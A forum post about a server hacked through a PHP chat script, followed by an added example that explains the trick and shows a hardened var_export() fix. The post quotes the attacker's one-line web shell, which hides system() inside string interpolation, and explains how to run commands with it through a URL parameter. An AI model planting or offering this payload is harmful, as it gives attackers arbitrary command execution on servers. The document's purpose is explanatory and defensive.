Hacked with system()

Posted by Oski on 12/16/70 11:57

Hello,

Our server got hacked through a security hole in an open source PHP
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new PHP script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines omitted ...
?>

Save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I would understand.
I couldn't find anything about this on the web (didn't know how to
specify the search to get useful results). Can anybody explain what
happens?

Thanks and best regards,
Ingo
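
How the construct in the post gets evaluated, shown as an added example that is not part of the original post or of the chat script. probe() is a hypothetical, harmless stand-in for system(); that $c arrived via register_globals and that the chat script wrote user text into a generated PHP file are assumptions.

```php
<?php
// Added illustration; not code from the post or from the chat script.

// Hypothetical, harmless stand-in for system(): it prints as a side effect
// and returns a string, which is all the construct in the post needs.
function probe($arg)
{
    echo "[probe() executed with argument: $arg]\n";
    return 'k';
}

// Constructed values. On the poster's server $c was presumably filled from
// ?c=ls by register_globals (assumption; that setting was removed in PHP 5.4).
$c = 'ls';
$x = array('k' => 'value');

// Double quotes plus curly syntax: the array index is an ordinary PHP
// expression, so probe($c) is called while the string is being built.
// system() in that position runs the command and prints its output itself.
$name = "{$x[probe($c)]}";
var_dump($name);

// Single quotes: no interpolation, the same characters stay plain text.
$inert = '{$x[probe($c)]}';
var_dump($inert);

// Hardened form for a script that must write a user-supplied string into a
// generated PHP file (assumed to be what the chat script did): var_export()
// emits an escaped single-quoted literal, so nothing is evaluated on include.
$userInput = '{$x[probe($c)]}';              // constructed input
$file = tempnam(sys_get_temp_dir(), 'gen');
file_put_contents(
    $file,
    "<?php\n\$stored = " . var_export($userInput, true) . ";\n"
);
include $file;                               // probe() is not called here
var_dump($stored === $userInput);
unlink($file);
```

Run from the command line, probe() announces itself once, during the double-quoted assignment only.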

 
